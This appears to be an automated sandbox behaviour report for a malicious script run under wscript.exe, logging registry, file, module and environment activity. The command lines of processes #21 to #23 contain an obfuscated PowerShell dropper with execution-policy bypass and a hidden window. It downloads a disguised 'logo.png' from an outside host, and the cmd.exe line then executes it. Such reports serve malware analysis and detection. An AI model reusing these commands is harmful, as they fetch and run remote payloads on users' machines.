Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x568, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:21 (UTC) True 1
Fn
Get Time type = Ticks, time = 149090 True 1
Fn
Get Time type = Performance Ctr, time = 20331754719 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #21: powershell.exe
354 0
»
Information Value
ID #21
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:19, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:06
OS Process Information
»
Information Value
PID 0x568
Parent PID 0x41c (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5FC
0x 3B4
0x BD8
0x BD0
0x BD4
0x BE8
0x 7A4
0x 7B0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x7FF0010D000 0x7FF0010DFFF First Execution - 64-bit 0x7FF0010D120, 0x7FF0010D0E0, ... False False
...
powershell.exe 0x13FF20000 0x13FF96FFF Relevant Image - 64-bit - False False
...
buffer 0x7FF000FB000 0x7FF000FBFFF First Execution - 64-bit 0x7FF000FBA40, 0x7FF000FB012 False False
...
buffer 0x7FF00133000 0x7FF00133FFF First Execution - 64-bit 0x7FF00133A7D False False
...
buffer 0x02B8B000 0x02B97FFF First Execution - 64-bit 0x02B964E0, 0x02B97308, ... False False
...
buffer 0x7FF00135000 0x7FF00135FFF First Execution - 64-bit 0x7FF0013507D False False
...
buffer 0x7FF00136000 0x7FF00136FFF First Execution - 64-bit 0x7FF0013607D False False
...
buffer 0x7FF0010F000 0x7FF0010FFFF First Execution - 64-bit 0x7FF0010F000 False False
...
buffer 0x7FF00270000 0x7FF00270FFF First Execution - 64-bit 0x7FF00270130 False False
...
Host Behavior
File (109)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (88)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment (73)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 67
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #22: cmd.exe
50 0
»
Information Value
ID #22
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:21, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:04
OS Process Information
»
Information Value
PID 0xbcc
Parent PID 0x8c0 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BDC
Host Behavior
File (7)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:24 (UTC) True 1
Fn
Get Time type = Ticks, time = 152334 True 1
Fn
Get Time type = Performance Ctr, time = 20662349610 True 1
Fn
Environment (13)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Process #23: powershell.exe
268 0
»
Information Value
ID #23
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:22, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:03
OS Process Information
»
Information Value
PID 0xafc
Parent PID 0xbcc (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9E4
0x A30
0x A0C
0x B7C
0x AEC
0x BB8
0x 808
0x A20
Host Behavior
File (34)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
